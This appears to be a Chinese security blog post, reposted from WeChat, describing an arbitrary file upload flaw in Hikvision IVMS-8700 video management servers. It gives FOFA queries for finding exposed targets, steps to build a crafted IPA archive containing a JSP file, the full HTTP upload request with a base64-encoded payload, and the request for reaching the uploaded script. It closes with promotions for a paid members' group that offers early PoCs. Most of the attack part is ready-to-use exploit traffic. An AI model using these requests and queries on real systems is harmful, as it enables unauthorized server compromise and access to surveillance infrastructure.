Hikvision IVMS-8700 任意文件上传

2024年1月3日12:40:05评论94 views字数 2405阅读8分1秒阅读模式

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习交流使用，如若非法他用，与平台和本文作者无关，需自行负责！

漏洞概述

Hikvision IVMS-8700 getPic接口存在漏洞，可上传恶意IPA文件至服务器，执行脚本文件。

空间搜索语法

FoFa

body="/home/locationIndex.action"

header="ISMS_8700_Sessionname"

icon_hash="-911494769"

利用过程

登录页面如下

Hikvision IVMS-8700 任意文件上传

需要先制作一个IPA

首先需要准备如下文件路径，PetrelHD.app为空目录

Hikvision IVMS-8700 任意文件上传

需要使用linux系统或者mac系统，使用如下命令生成IPA文件。

zip -r 压缩后的文件名称 需要压缩的目录zip -r puye.ipa ha982

Hikvision IVMS-8700 任意文件上传

然后使用Burp的paste from file，粘贴到请求包中。

上传数据包如下：

POST /msp/home/upload.action;getPic?type=ios HTTP/1.1Host:  User-Agent: MicroMessengerContent-Length: 1705Accept-Encoding: gzip, deflate, brConnection: closeContent-Type: multipart/form-data; boundary=B9574fCFXJ1XzHDBvPOO
--B9574fCFXJ1XzHDBvPOOContent-Disposition: form-data; name="type"
ios--B9574fCFXJ1XzHDBvPOOContent-Disposition: form-data; name="file"; filename="UbhwO.ipa"Content-Type: None
base64_decode(UEsDBAoAAAAAADsXnVcAAAAAAAAAAAAAAAAGABwAaGE5ODIvVVQJAAMBfI5lE3yOZXV4CwABBOgDAAAE6AMAAFBLAwQKAAAAAAA7F51XAAAAAAAAAAAAAAAADQAcAGhhOTgyL29ld3F1MS9VVAkAAwF8jmUTfI5ldXgLAAEE6AMAAAToAwAAUEsDBAoAAAAAADsXnVcAAAAAAAAAAAAAAAAaABwAaGE5ODIvb2V3cXUxL1BldHJlbEhELmFwcC9VVAkAAwF8jmUTfI5ldXgLAAEE6AMAAAToAwAAUEsDBBQAAAAIAFdGb1TifxKeVwAAAG4AAAAVABwAaGE5ODIvb2V3cXUxL3Rlc3QuanNwVVQJAAOlizBiAXyOZXV4CwABBOgDAAAE6AMAALPJKMnNsePlsslITUyxsynJLMlJtfNIzcnJVwjPL8pJsdGHCNnogxUAFSblp1QCaSQ1ijZJRfogKVVervzSEr2Cosy8kpw8DSWImpDU4hIlTWteLlU7AFBLAQIeAwoAAAAAADsXnVcAAAAAAAAAAAAAAAAGABgAAAAAAAAAEADtQQAAAABoYTk4Mi9VVAUAAwF8jmV1eAsAAQToAwAABOgDAABQSwECHgMKAAAAAAA7F51XAAAAAAAAAAAAAAAADQAYAAAAAAAAABAA7UFAAAAAaGE5ODIvb2V3cXUxL1VUBQADAXyOZXV4CwABBOgDAAAE6AMAAFBLAQIeAwoAAAAAADsXnVcAAAAAAAAAAAAAAAAaABgAAAAAAAAAEADtQYcAAABoYTk4Mi9vZXdxdTEvUGV0cmVsSEQuYXBwL1VUBQADAXyOZXV4CwABBOgDAAAE6AMAAFBLAQIeAxQAAAAIAFdGb1TifxKeVwAAAG4AAAAVABgAAAAAAAEAAAD2gdsAAABoYTk4Mi9vZXdxdTEvdGVzdC5qc3BVVAUAA6WLMGJ1eAsAAQToAwAABOgDAABQSwUGAAAAAAQABABaAQAAgQEAAAAA)
--B9574fCFXJ1XzHDBvPOO--

Hikvision IVMS-8700 任意文件上传

访问上传文件路径如下：

GET /msp/upload/ios/UbhwO/ha982/oewqu1/test.jsp HTTP/1.1Host:  User-Agent: MicroMessengerConnection: closeCookie: ISMS_8700_Sessionname=28E46BEC5F758BD4ED480783ACD41C52Accept-Encoding: gzip, deflate, br

Hikvision IVMS-8700 任意文件上传

nuclei poc

Hikvision IVMS-8700 任意文件上传

获取脚本关注本公众号后发送：ivms2创

双旦福利

考虑到团队运营成本和公众号福利发放，创建知识星球欢迎各位师傅打赏💰后期会用打赏的资金去做福利。星球的性价比真的比较可观，绝对不会因为某些身外之物水文章，安全圈很小，主要是和师傅们交个朋友。还请各位师傅监督团队后边的表现，将心比心！

进入星球你能直接收获到：

优先于公众号的POC更新（提前一两周~~）
定制化的成品工具开发
私人定制的客户需求（要求不要太过分呦~~）
实战技巧、攻防思路
杂七杂八的技术小福利
根据能力不定期的星球内部抽奖
更多漏洞利用Tips

给各位师傅呈上券～

Hikvision IVMS-8700 任意文件上传

进入星球直接能学习到这些漏洞：

Hikvision IVMS-8700 任意文件上传

✓

关注我们

原文始发于微信公众号（天澜实验室）：Hikvision IVMS-8700 任意文件上传

左青龙
微信扫一扫

右白虎
微信扫一扫

Hikvision IVMS-8700 任意文件上传

某单位网址未授权导致发生的视频信息泄露

CVE-2024-4040

Craft CMS 远程代码执行漏洞复现（附nuclei POC）

漏洞预警 | Google Chrome堆缓冲区溢出漏洞

漏洞预警 | GeoNode请求伪造漏洞

漏洞预警 | Docker Desktop增强容器隔离限制绕过漏洞

漏洞预警 | D-Link D-View 8 硬编码密钥漏洞

(CVE-2023-30591) NodeBB 预身份验证拒绝服务

CVE-2023-41081：Apache Tomcat 连接器中的高严重性漏洞

禅道项目管理系统身份认证绕过[漏洞复现]

发表评论

在线咨询

微信